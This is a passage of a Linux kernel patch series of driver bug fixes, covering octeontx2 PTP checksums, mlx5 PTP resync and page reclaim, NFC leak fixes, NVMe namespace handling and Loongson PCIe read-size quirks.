++			dma_unmap_single(&np->pci_dev->dev,
++					 np->rx_ring[i].buffer, np->rx_buf_sz,
++					 DMA_FROM_DEVICE);
++			dev_kfree_skb(skb);
++			np->rx_ring[i].skbuff = NULL;
++		}
++	}
++
++	for (i = 0; i < TX_RING_SIZE; i++) {
++		struct sk_buff *skb = np->tx_ring[i].skbuff;
++
++		if (skb) {
++			dma_unmap_single(&np->pci_dev->dev,
++					 np->tx_ring[i].buffer, skb->len,
++					 DMA_TO_DEVICE);
++			dev_kfree_skb(skb);
++			np->tx_ring[i].skbuff = NULL;
++		}
++	}
++
++	return 0;
++}
++
++static const struct pci_device_id fealnx_pci_tbl[] = {
++	{0x1516, 0x0800, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0},
++	{0x1516, 0x0803, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 1},
++	{0x1516, 0x0891, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 2},
++	{} /* terminate list */
++};
++MODULE_DEVICE_TABLE(pci, fealnx_pci_tbl);
++
++
++static struct pci_driver fealnx_driver = {
++	.name		= "fealnx",
++	.id_table	= fealnx_pci_tbl,
++	.probe		= fealnx_init_one,
++	.remove		= fealnx_remove_one,
++};
++
++module_pci_driver(fealnx_driver);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+index 684cb8ec9f21b..10e11262d48a0 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+@@ -793,7 +793,7 @@ static int otx2_prepare_ipv6_flow(struct ethtool_rx_flow_spec *fsp,
+ 
+ 		/* NPC profile doesn't extract AH/ESP header fields */
+ 		if ((ah_esp_mask->spi & ah_esp_hdr->spi) ||
+-		    (ah_esp_mask->tclass & ah_esp_mask->tclass))
++		    (ah_esp_mask->tclass & ah_esp_hdr->tclass))
+ 			return -EOPNOTSUPP;
+ 
+ 		if (flow_type == AH_V6_FLOW)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+index ef10aef3cda02..7045fedfd73a0 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+@@ -10,6 +10,7 @@
+ #include <net/tso.h>
+ #include <linux/bpf.h>
+ #include <linux/bpf_trace.h>
++#include <net/ip6_checksum.h>
+ 
+ #include "otx2_reg.h"
+ #include "otx2_common.h"
+@@ -699,7 +700,7 @@ static void otx2_sqe_add_ext(struct otx2_nic *pfvf, struct otx2_snd_queue *sq,
+ 
+ static void otx2_sqe_add_mem(struct otx2_snd_queue *sq, int *offset,
+ 			     int alg, u64 iova, int ptp_offset,
+-			     u64 base_ns, int udp_csum)
++			     u64 base_ns, bool udp_csum_crt)
+ {
+ 	struct nix_sqe_mem_s *mem;
+ 
+@@ -711,7 +712,7 @@ static void otx2_sqe_add_mem(struct otx2_snd_queue *sq, int *offset,
+ 
+ 	if (ptp_offset) {
+ 		mem->start_offset = ptp_offset;
+-		mem->udp_csum_crt = udp_csum;
++		mem->udp_csum_crt = !!udp_csum_crt;
+ 		mem->base_ns = base_ns;
+ 		mem->step_type = 1;
+ 	}
+@@ -986,10 +987,11 @@ static bool otx2_validate_network_transport(struct sk_buff *skb)
+ 	return false;
+ }
+ 
+-static bool otx2_ptp_is_sync(struct sk_buff *skb, int *offset, int *udp_csum)
++static bool otx2_ptp_is_sync(struct sk_buff *skb, int *offset, bool *udp_csum_crt)
+ {
+ 	struct ethhdr *eth = (struct ethhdr *)(skb->data);
+ 	u16 nix_offload_hlen = 0, inner_vhlen = 0;
++	bool udp_hdr_present = false, is_sync;
+ 	u8 *data = skb->data, *msgtype;
+ 	__be16 proto = eth->h_proto;
+ 	int network_depth = 0;
+@@ -1029,45 +1031,81 @@ static bool otx2_ptp_is_sync(struct sk_buff *skb, int *offset, int *udp_csum)
+ 		if (!otx2_validate_network_transport(skb))
+ 			return false;
+ 
+-		*udp_csum = 1;
+ 		*offset = nix_offload_hlen + skb_transport_offset(skb) +
+ 			  sizeof(struct udphdr);
++		udp_hdr_present = true;
++
+ 	}
+ 
+ 	msgtype = data + *offset;
+-
+ 	/* Check PTP messageId is SYNC or not */
+-	return (*msgtype & 0xf) == 0;
++	is_sync = !(*msgtype & 0xf);
++	if (is_sync)
++		*udp_csum_crt = udp_hdr_present;
++	else
++		*offset = 0;
++
++	return is_sync;
+ }
+ 
+ static void otx2_set_txtstamp(struct otx2_nic *pfvf, struct sk_buff *skb,
+ 			      struct otx2_snd_queue *sq, int *offset)
+ {
++	struct ethhdr	*eth = (struct ethhdr *)(skb->data);
+ 	struct ptpv2_tstamp *origin_tstamp;
+-	int ptp_offset = 0, udp_csum = 0;
++	bool udp_csum_crt = false;
++	unsigned int udphoff;
+ 	struct timespec64 ts;
++	int ptp_offset = 0;
++	__wsum skb_csum;
+ 	u64 iova;
+ 
+ 	if (unlikely(!skb_shinfo(skb)->gso_size &&
+ 		     (skb_shinfo(skb)->tx_flags & SKBTX_HW_TSTAMP))) {
+-		if (unlikely(pfvf->flags & OTX2_FLAG_PTP_ONESTEP_SYNC)) {
+-			if (otx2_ptp_is_sync(skb, &ptp_offset, &udp_csum)) {
+-				origin_tstamp = (struct ptpv2_tstamp *)
+-						((u8 *)skb->data + ptp_offset +
+-						 PTP_SYNC_SEC_OFFSET);
+-				ts = ns_to_timespec64(pfvf->ptp->tstamp);
+-				origin_tstamp->seconds_msb = htons((ts.tv_sec >> 32) & 0xffff);
+-				origin_tstamp->seconds_lsb = htonl(ts.tv_sec & 0xffffffff);
+-				origin_tstamp->nanoseconds = htonl(ts.tv_nsec);
+-				/* Point to correction field in PTP packet */
+-				ptp_offset += 8;
++		if (unlikely(pfvf->flags & OTX2_FLAG_PTP_ONESTEP_SYNC &&
++			     otx2_ptp_is_sync(skb, &ptp_offset, &udp_csum_crt))) {
++			origin_tstamp = (struct ptpv2_tstamp *)
++					((u8 *)skb->data + ptp_offset +
++					 PTP_SYNC_SEC_OFFSET);
++			ts = ns_to_timespec64(pfvf->ptp->tstamp);
++			origin_tstamp->seconds_msb = htons((ts.tv_sec >> 32) & 0xffff);
++			origin_tstamp->seconds_lsb = htonl(ts.tv_sec & 0xffffffff);
++			origin_tstamp->nanoseconds = htonl(ts.tv_nsec);
++			/* Point to correction field in PTP packet */
++			ptp_offset += 8;
++
++			/* When user disables hw checksum, stack calculates the csum,
++			 * but it does not cover ptp timestamp which is added later.
++			 * Recalculate the checksum manually considering the timestamp.
++			 */
++			if (udp_csum_crt) {
++				struct udphdr *uh = udp_hdr(skb);
++
++				if (skb->ip_summed != CHECKSUM_PARTIAL && uh->check != 0) {
++					udphoff = skb_transport_offset(skb);
++					uh->check = 0;
++					skb_csum = skb_checksum(skb, udphoff, skb->len - udphoff,
++								0);
++					if (ntohs(eth->h_proto) == ETH_P_IPV6)
++						uh->check = csum_ipv6_magic(&ipv6_hdr(skb)->saddr,
++									    &ipv6_hdr(skb)->daddr,
++									    skb->len - udphoff,
++									    ipv6_hdr(skb)->nexthdr,
++									    skb_csum);
++					else
++						uh->check = csum_tcpudp_magic(ip_hdr(skb)->saddr,
++									      ip_hdr(skb)->daddr,
++									      skb->len - udphoff,
++									      IPPROTO_UDP,
++									      skb_csum);
++				}
+ 			}
+ 		} else {
+ 			skb_shinfo(skb)->tx_flags |= SKBTX_IN_PROGRESS;
+ 		}
+ 		iova = sq->timestamps->iova + (sq->head * sizeof(u64));
+ 		otx2_sqe_add_mem(sq, offset, NIX_SENDMEMALG_E_SETTSTMP, iova,
+-				 ptp_offset, pfvf->ptp->base_ns, udp_csum);
++				 ptp_offset, pfvf->ptp->base_ns, udp_csum_crt);
+ 	} else {
+ 		skb_tx_timestamp(skb);
+ 	}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c b/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
+index cdc87ecae5d39..d000236ddbac5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
+@@ -90,4 +90,8 @@ void mlx5_ec_cleanup(struct mlx5_core_dev *dev)
+ 	err = mlx5_wait_for_pages(dev, &dev->priv.page_counters[MLX5_HOST_PF]);
+ 	if (err)
+ 		mlx5_core_warn(dev, "Timeout reclaiming external host PF pages err(%d)\n", err);
++
++	err = mlx5_wait_for_pages(dev, &dev->priv.page_counters[MLX5_VF]);
++	if (err)
++		mlx5_core_warn(dev, "Timeout reclaiming external host VFs pages err(%d)\n", err);
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c b/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
+index 8469e9c386706..ae75e230170b5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
+@@ -86,7 +86,19 @@ static bool mlx5e_ptp_ts_cqe_drop(struct mlx5e_ptpsq *ptpsq, u16 skb_cc, u16 skb
+ 	return (ptpsq->ts_cqe_ctr_mask && (skb_cc != skb_id));
+ }
+ 
+-static void mlx5e_ptp_skb_fifo_ts_cqe_resync(struct mlx5e_ptpsq *ptpsq, u16 skb_cc, u16 skb_id)
++static bool mlx5e_ptp_ts_cqe_ooo(struct mlx5e_ptpsq *ptpsq, u16 skb_id)
++{
++	u16 skb_cc = PTP_WQE_CTR2IDX(ptpsq->skb_fifo_cc);
++	u16 skb_pc = PTP_WQE_CTR2IDX(ptpsq->skb_fifo_pc);
++
++	if (PTP_WQE_CTR2IDX(skb_id - skb_cc) >= PTP_WQE_CTR2IDX(skb_pc - skb_cc))
++		return true;
++
++	return false;
++}
++
++static void mlx5e_ptp_skb_fifo_ts_cqe_resync(struct mlx5e_ptpsq *ptpsq, u16 skb_cc,
++					     u16 skb_id, int budget)
+ {
+ 	struct skb_shared_hwtstamps hwts = {};
+ 	struct sk_buff *skb;
+@@ -98,6 +110,7 @@ static void mlx5e_ptp_skb_fifo_ts_cqe_resync(struct mlx5e_ptpsq *ptpsq, u16 skb_
+ 		hwts.hwtstamp = mlx5e_skb_cb_get_hwts(skb)->cqe_hwtstamp;
+ 		skb_tstamp_tx(skb, &hwts);
+ 		ptpsq->cq_stats->resync_cqe++;
++		napi_consume_skb(skb, budget);
+ 		skb_cc = PTP_WQE_CTR2IDX(ptpsq->skb_fifo_cc);
+ 	}
+ }
+@@ -118,8 +131,14 @@ static void mlx5e_ptp_handle_ts_cqe(struct mlx5e_ptpsq *ptpsq,
+ 		goto out;
+ 	}
+ 
+-	if (mlx5e_ptp_ts_cqe_drop(ptpsq, skb_cc, skb_id))
+-		mlx5e_ptp_skb_fifo_ts_cqe_resync(ptpsq, skb_cc, skb_id);
++	if (mlx5e_ptp_ts_cqe_drop(ptpsq, skb_cc, skb_id)) {
++		if (mlx5e_ptp_ts_cqe_ooo(ptpsq, skb_id)) {
++			/* already handled by a previous resync */
++			ptpsq->cq_stats->ooo_cqe_drop++;
++			return;
++		}
++		mlx5e_ptp_skb_fifo_ts_cqe_resync(ptpsq, skb_cc, skb_id, budget);
++	}
+ 
+ 	skb = mlx5e_skb_fifo_pop(&ptpsq->skb_fifo);
+ 	hwtstamp = mlx5e_cqe_ts_to_ns(sq->ptp_cyc2time, sq->clock, get_cqe_ts(cqe));
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h b/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
+index 853f312cd7572..1b3a65325ece1 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
+@@ -81,7 +81,7 @@ void mlx5e_free_txqsq_descs(struct mlx5e_txqsq *sq);
+ static inline bool
+ mlx5e_skb_fifo_has_room(struct mlx5e_skb_fifo *fifo)
+ {
+-	return (*fifo->pc - *fifo->cc) < fifo->mask;
++	return (u16)(*fifo->pc - *fifo->cc) < fifo->mask;
+ }
+ 
+ static inline bool
+@@ -297,6 +297,8 @@ void mlx5e_skb_fifo_push(struct mlx5e_skb_fifo *fifo, struct sk_buff *skb)
+ static inline
+ struct sk_buff *mlx5e_skb_fifo_pop(struct mlx5e_skb_fifo *fifo)
+ {
++	WARN_ON_ONCE(*fifo->pc == *fifo->cc);
++
+ 	return *mlx5e_skb_fifo_get(fifo, (*fifo->cc)++);
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_stats.c b/drivers/net/ethernet/mellanox/mlx5/core/en_stats.c
+index 6687b8136e441..4478223c17209 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_stats.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_stats.c
+@@ -2138,6 +2138,7 @@ static const struct counter_desc ptp_cq_stats_desc[] = {
+ 	{ MLX5E_DECLARE_PTP_CQ_STAT(struct mlx5e_ptp_cq_stats, abort_abs_diff_ns) },
+ 	{ MLX5E_DECLARE_PTP_CQ_STAT(struct mlx5e_ptp_cq_stats, resync_cqe) },
+ 	{ MLX5E_DECLARE_PTP_CQ_STAT(struct mlx5e_ptp_cq_stats, resync_event) },
++	{ MLX5E_DECLARE_PTP_CQ_STAT(struct mlx5e_ptp_cq_stats, ooo_cqe_drop) },
+ };
+ 
+ static const struct counter_desc ptp_rq_stats_desc[] = {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_stats.h b/drivers/net/ethernet/mellanox/mlx5/core/en_stats.h
+index 375752d6546d5..b77100b60b505 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_stats.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_stats.h
+@@ -461,6 +461,7 @@ struct mlx5e_ptp_cq_stats {
+ 	u64 abort_abs_diff_ns;
+ 	u64 resync_cqe;
+ 	u64 resync_event;
++	u64 ooo_cqe_drop;
+ };
+ 
+ struct mlx5e_rep_stats {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index c981fa77f4398..f3b74cb67b71c 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -1070,7 +1070,8 @@ mlx5_eswitch_add_send_to_vport_rule(struct mlx5_eswitch *on_esw,
+ 	dest.vport.flags |= MLX5_FLOW_DEST_VPORT_VHCA_ID;
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_FWD_DEST;
+ 
+-	if (rep->vport == MLX5_VPORT_UPLINK)
++	if (MLX5_CAP_ESW_FLOWTABLE(on_esw->dev, flow_source) &&
++	    rep->vport == MLX5_VPORT_UPLINK)
+ 		spec->flow_context.flow_source = MLX5_FLOW_CONTEXT_FLOW_SOURCE_LOCAL_VPORT;
+ 
+ 	flow_rule = mlx5_add_flow_rules(mlx5_eswitch_get_slow_fdb(on_esw),
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lib/geneve.c b/drivers/net/ethernet/mellanox/mlx5/core/lib/geneve.c
+index 23361a9ae4fa0..6dc83e871cd76 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lib/geneve.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lib/geneve.c
+@@ -105,6 +105,7 @@ int mlx5_geneve_tlv_option_add(struct mlx5_geneve *geneve, struct geneve_opt *op
+ 		geneve->opt_type = opt->type;
+ 		geneve->obj_id = res;
+ 		geneve->refcount++;
++		res = 0;
+ 	}
+ 
+ unlock:
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/sriov.c b/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
+index 3008e9ce2bbff..20d7662c10fb6 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
+@@ -147,6 +147,10 @@ mlx5_device_disable_sriov(struct mlx5_core_dev *dev, int num_vfs, bool clear_vf)
+ 
+ 	mlx5_eswitch_disable_sriov(dev->priv.eswitch, clear_vf);
+ 
++	/* For ECPFs, skip waiting for host VF pages until ECPF is destroyed */
++	if (mlx5_core_is_ecpf(dev))
++		return;
++
+ 	if (mlx5_wait_for_pages(dev, &dev->priv.page_counters[MLX5_VF]))
+ 		mlx5_core_warn(dev, "timeout reclaiming VFs pages\n");
+ }
+diff --git a/drivers/net/ethernet/sun/sunhme.c b/drivers/net/ethernet/sun/sunhme.c
+index 1c16548415cdd..b0c7ab74a82ed 100644
+--- a/drivers/net/ethernet/sun/sunhme.c
++++ b/drivers/net/ethernet/sun/sunhme.c
+@@ -2894,8 +2894,10 @@ static int happy_meal_pci_probe(struct pci_dev *pdev,
+ 		goto err_out_clear_quattro;
+ 	}
+ 
+-	hpreg_res = devm_request_region(&pdev->dev, pci_resource_start(pdev, 0),
+-					pci_resource_len(pdev, 0), DRV_NAME);
++	hpreg_res = devm_request_mem_region(&pdev->dev,
++					    pci_resource_start(pdev, 0),
++					    pci_resource_len(pdev, 0),
++					    DRV_NAME);
+ 	if (!hpreg_res) {
+ 		err = -EBUSY;
+ 		dev_err(&pdev->dev, "Cannot obtain PCI resources, aborting.\n");
+diff --git a/drivers/net/mdio/mdio-mscc-miim.c b/drivers/net/mdio/mdio-mscc-miim.c
+index 51f68daac152f..34b87389788bb 100644
+--- a/drivers/net/mdio/mdio-mscc-miim.c
++++ b/drivers/net/mdio/mdio-mscc-miim.c
+@@ -52,6 +52,7 @@ struct mscc_miim_info {
+ struct mscc_miim_dev {
+ 	struct regmap *regs;
+ 	int mii_status_offset;
++	bool ignore_read_errors;
+ 	struct regmap *phy_regs;
+ 	const struct mscc_miim_info *info;
+ 	struct clk *clk;
+@@ -138,7 +139,7 @@ static int mscc_miim_read(struct mii_bus *bus, int mii_id, int regnum)
+ 		goto out;
+ 	}
+ 
+-	if (val & MSCC_MIIM_DATA_ERROR) {
++	if (!miim->ignore_read_errors && !!(val & MSCC_MIIM_DATA_ERROR)) {
+ 		ret = -EIO;
+ 		goto out;
+ 	}
+@@ -218,7 +219,8 @@ static const struct regmap_config mscc_miim_phy_regmap_config = {
+ };
+ 
+ int mscc_miim_setup(struct device *dev, struct mii_bus **pbus, const char *name,
+-		    struct regmap *mii_regmap, int status_offset)
++		    struct regmap *mii_regmap, int status_offset,
++		    bool ignore_read_errors)
+ {
+ 	struct mscc_miim_dev *miim;
+ 	struct mii_bus *bus;
+@@ -240,6 +242,7 @@ int mscc_miim_setup(struct device *dev, struct mii_bus **pbus, const char *name,
+ 
+ 	miim->regs = mii_regmap;
+ 	miim->mii_status_offset = status_offset;
++	miim->ignore_read_errors = ignore_read_errors;
+ 
+ 	*pbus = bus;
+ 
+@@ -291,7 +294,7 @@ static int mscc_miim_probe(struct platform_device *pdev)
+ 		return dev_err_probe(dev, PTR_ERR(phy_regmap),
+ 				     "Unable to create phy register regmap\n");
+ 
+-	ret = mscc_miim_setup(dev, &bus, "mscc_miim", mii_regmap, 0);
++	ret = mscc_miim_setup(dev, &bus, "mscc_miim", mii_regmap, 0, false);
+ 	if (ret < 0) {
+ 		dev_err(dev, "Unable to setup the MDIO bus\n");
+ 		return ret;
+diff --git a/drivers/nfc/st-nci/se.c b/drivers/nfc/st-nci/se.c
+index ec87dd21e054a..b2f1ced8e6dd2 100644
+--- a/drivers/nfc/st-nci/se.c
++++ b/drivers/nfc/st-nci/se.c
+@@ -672,6 +672,12 @@ int st_nci_se_io(struct nci_dev *ndev, u32 se_idx,
+ 					ST_NCI_EVT_TRANSMIT_DATA, apdu,
+ 					apdu_length);
+ 	default:
++		/* Need to free cb_context here as at the moment we can't
++		 * clearly indicate to the caller if the callback function
++		 * would be called (and free it) or not. In both cases a
++		 * negative value may be returned to the caller.
++		 */
++		kfree(cb_context);
+ 		return -ENODEV;
+ 	}
+ }
+diff --git a/drivers/nfc/st21nfca/se.c b/drivers/nfc/st21nfca/se.c
+index df8d27cf2956b..dae288bebcb5a 100644
+--- a/drivers/nfc/st21nfca/se.c
++++ b/drivers/nfc/st21nfca/se.c
+@@ -236,6 +236,12 @@ int st21nfca_hci_se_io(struct nfc_hci_dev *hdev, u32 se_idx,
+ 					ST21NFCA_EVT_TRANSMIT_DATA,
+ 					apdu, apdu_length);
+ 	default:
++		/* Need to free cb_context here as at the moment we can't
++		 * clearly indicate to the caller if the callback function
++		 * would be called (and free it) or not. In both cases a
++		 * negative value may be returned to the caller.
++		 */
++		kfree(cb_context);
+ 		return -ENODEV;
+ 	}
+ }
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 8b64211411626..fbed8d1a02ef4 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -38,6 +38,7 @@ struct nvme_ns_info {
+ 	bool is_shared;
+ 	bool is_readonly;
+ 	bool is_ready;
++	bool is_removed;
+ };
+ 
+ unsigned int admin_timeout = 60;
+@@ -1445,16 +1446,8 @@ static int nvme_identify_ns(struct nvme_ctrl *ctrl, unsigned nsid,
+ 	error = nvme_submit_sync_cmd(ctrl->admin_q, &c, *id, sizeof(**id));
+ 	if (error) {
+ 		dev_warn(ctrl->device, "Identify namespace failed (%d)\n", error);
+-		goto out_free_id;
++		kfree(*id);
+ 	}
+-
+-	error = NVME_SC_INVALID_NS | NVME_SC_DNR;
+-	if ((*id)->ncap == 0) /* namespace not allocated or attached */
+-		goto out_free_id;
+-	return 0;
+-
+-out_free_id:
+-	kfree(*id);
+ 	return error;
+ }
+ 
+@@ -1468,6 +1461,13 @@ static int nvme_ns_info_from_identify(struct nvme_ctrl *ctrl,
+ 	ret = nvme_identify_ns(ctrl, info->nsid, &id);
+ 	if (ret)
+ 		return ret;
++
++	if (id->ncap == 0) {
++		/* namespace not allocated or attached */
++		info->is_removed = true;
++		return -ENODEV;
++	}
++
+ 	info->anagrpid = id->anagrpid;
+ 	info->is_shared = id->nmic & NVME_NS_NMIC_SHARED;
+ 	info->is_readonly = id->nsattr & NVME_NS_ATTR_RO;
+@@ -4418,6 +4418,7 @@ static void nvme_scan_ns(struct nvme_ctrl *ctrl, unsigned nsid)
+ {
+ 	struct nvme_ns_info info = { .nsid = nsid };
+ 	struct nvme_ns *ns;
++	int ret;
+ 
+ 	if (nvme_identify_ns_descs(ctrl, &info))
+ 		return;
+@@ -4434,19 +4435,19 @@ static void nvme_scan_ns(struct nvme_ctrl *ctrl, unsigned nsid)
+ 	 * set up a namespace.  If not fall back to the legacy version.
+ 	 */
+ 	if ((ctrl->cap & NVME_CAP_CRMS_CRIMS) ||
+-	    (info.ids.csi != NVME_CSI_NVM && info.ids.csi != NVME_CSI_ZNS)) {
+-		if (nvme_ns_info_from_id_cs_indep(ctrl, &info))
+-			return;
+-	} else {
+-		if (nvme_ns_info_from_identify(ctrl, &info))
+-			return;
+-	}
++	    (info.ids.csi != NVME_CSI_NVM && info.ids.csi != NVME_CSI_ZNS))
++		ret = nvme_ns_info_from_id_cs_indep(ctrl, &info);
++	else
++		ret = nvme_ns_info_from_identify(ctrl, &info);
++
++	if (info.is_removed)
++		nvme_ns_remove_by_nsid(ctrl, nsid);
+ 
+ 	/*
+ 	 * Ignore the namespace if it is not ready. We will get an AEN once it
+ 	 * becomes ready and restart the scan.
+ 	 */
+-	if (!info.is_ready)
++	if (ret || !info.is_ready)
+ 		return;
+ 
+ 	ns = nvme_find_get_ns(ctrl, nsid);
+diff --git a/drivers/nvme/host/fabrics.h b/drivers/nvme/host/fabrics.h
+index a6e22116e1396..dcac3df8a5f76 100644
+--- a/drivers/nvme/host/fabrics.h
++++ b/drivers/nvme/host/fabrics.h
+@@ -189,7 +189,8 @@ nvmf_ctlr_matches_baseopts(struct nvme_ctrl *ctrl,
+ 
+ static inline char *nvmf_ctrl_subsysnqn(struct nvme_ctrl *ctrl)
+ {
+-	if (!ctrl->subsys)
++	if (!ctrl->subsys ||
++	    !strcmp(ctrl->opts->subsysnqn, NVME_DISC_SUBSYS_NAME))
+ 		return ctrl->opts->subsysnqn;
+ 	return ctrl->subsys->subnqn;
+ }
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index 8cedc1ef496c7..1ca52ac163c2f 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -2486,6 +2486,10 @@ static int nvme_tcp_get_address(struct nvme_ctrl *ctrl, char *buf, int size)
+ 
+ 	len = nvmf_get_address(ctrl, buf, size);
+ 
++	mutex_lock(&queue->queue_lock);
++
++	if (!test_bit(NVME_TCP_Q_LIVE, &queue->flags))
++		goto done;
+ 	ret = kernel_getsockname(queue->sock, (struct sockaddr *)&src_addr);
+ 	if (ret > 0) {
+ 		if (len > 0)
+@@ -2493,6 +2497,8 @@ static int nvme_tcp_get_address(struct nvme_ctrl *ctrl, char *buf, int size)
+ 		len += scnprintf(buf + len, size - len, "%ssrc_addr=%pISc\n",
+ 				(len) ? "," : "", &src_addr);
+ 	}
++done:
++	mutex_unlock(&queue->queue_lock);
+ 
+ 	return len;
+ }
+diff --git a/drivers/pci/controller/pci-loongson.c b/drivers/pci/controller/pci-loongson.c
+index 05c50408f13b7..fe0f732f6e434 100644
+--- a/drivers/pci/controller/pci-loongson.c
++++ b/drivers/pci/controller/pci-loongson.c
+@@ -15,9 +15,14 @@
+ #include "../pci.h"
+ 
+ /* Device IDs */
+-#define DEV_PCIE_PORT_0	0x7a09
+-#define DEV_PCIE_PORT_1	0x7a19
+-#define DEV_PCIE_PORT_2	0x7a29
++#define DEV_LS2K_PCIE_PORT0	0x1a05
++#define DEV_LS7A_PCIE_PORT0	0x7a09
++#define DEV_LS7A_PCIE_PORT1	0x7a19
++#define DEV_LS7A_PCIE_PORT2	0x7a29
++#define DEV_LS7A_PCIE_PORT3	0x7a39
++#define DEV_LS7A_PCIE_PORT4	0x7a49
++#define DEV_LS7A_PCIE_PORT5	0x7a59
++#define DEV_LS7A_PCIE_PORT6	0x7a69
+ 
+ #define DEV_LS2K_APB	0x7a02
+ #define DEV_LS7A_GMAC	0x7a03
+@@ -53,11 +58,11 @@ static void bridge_class_quirk(struct pci_dev *dev)
+ 	dev->class = PCI_CLASS_BRIDGE_PCI_NORMAL;
+ }
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+-			DEV_PCIE_PORT_0, bridge_class_quirk);
++			DEV_LS7A_PCIE_PORT0, bridge_class_quirk);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+-			DEV_PCIE_PORT_1, bridge_class_quirk);
++			DEV_LS7A_PCIE_PORT1, bridge_class_quirk);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+-			DEV_PCIE_PORT_2, bridge_class_quirk);
++			DEV_LS7A_PCIE_PORT2, bridge_class_quirk);
+ 
+ static void system_bus_quirk(struct pci_dev *pdev)
+ {
+@@ -75,37 +80,33 @@ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+ 			DEV_LS7A_LPC, system_bus_quirk);
+ 
+-static void loongson_mrrs_quirk(struct pci_dev *dev)
++static void loongson_mrrs_quirk(struct pci_dev *pdev)
+ {
+-	struct pci_bus *bus = dev->bus;
+-	struct pci_dev *bridge;
+-	static const struct pci_device_id bridge_devids[] = {
+-		{ PCI_VDEVICE(LOONGSON, DEV_PCIE_PORT_0) },
+-		{ PCI_VDEVICE(LOONGSON, DEV_PCIE_PORT_1) },
+-		{ PCI_VDEVICE(LOONGSON, DEV_PCIE_PORT_2) },
+-		{ 0, },
+-	};
+-
+-	/* look for the matching bridge */
+-	while (!pci_is_root_bus(bus)) {
+-		bridge = bus->self;
+-		bus = bus->parent;
+-		/*
+-		 * Some Loongson PCIe ports have a h/w limitation of
+-		 * 256 bytes maximum read request size. They can't handle
+-		 * anything larger than this. So force this limit on
+-		 * any devices attached under these ports.
+-		 */
+-		if (pci_match_id(bridge_devids, bridge)) {
+-			if (pcie_get_readrq(dev) > 256) {
+-				pci_info(dev, "limiting MRRS to 256\n");
+-				pcie_set_readrq(dev, 256);
+-			}
+-			break;
+-		}
+-	}
++	/*
++	 * Some Loongson PCIe ports have h/w limitations of maximum read
++	 * request size. They can't handle anything larger than this. So
++	 * force this limit on any devices attached under these ports.
++	 */
++	struct pci_host_bridge *bridge = pci_find_host_bridge(pdev->bus);
++
++	bridge->no_inc_mrrs = 1;
+ }
+-DECLARE_PCI_FIXUP_ENABLE(PCI_ANY_ID, PCI_ANY_ID, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS2K_PCIE_PORT0, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT0, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT1, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT2, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT3, loongson_mrrs_quirk);
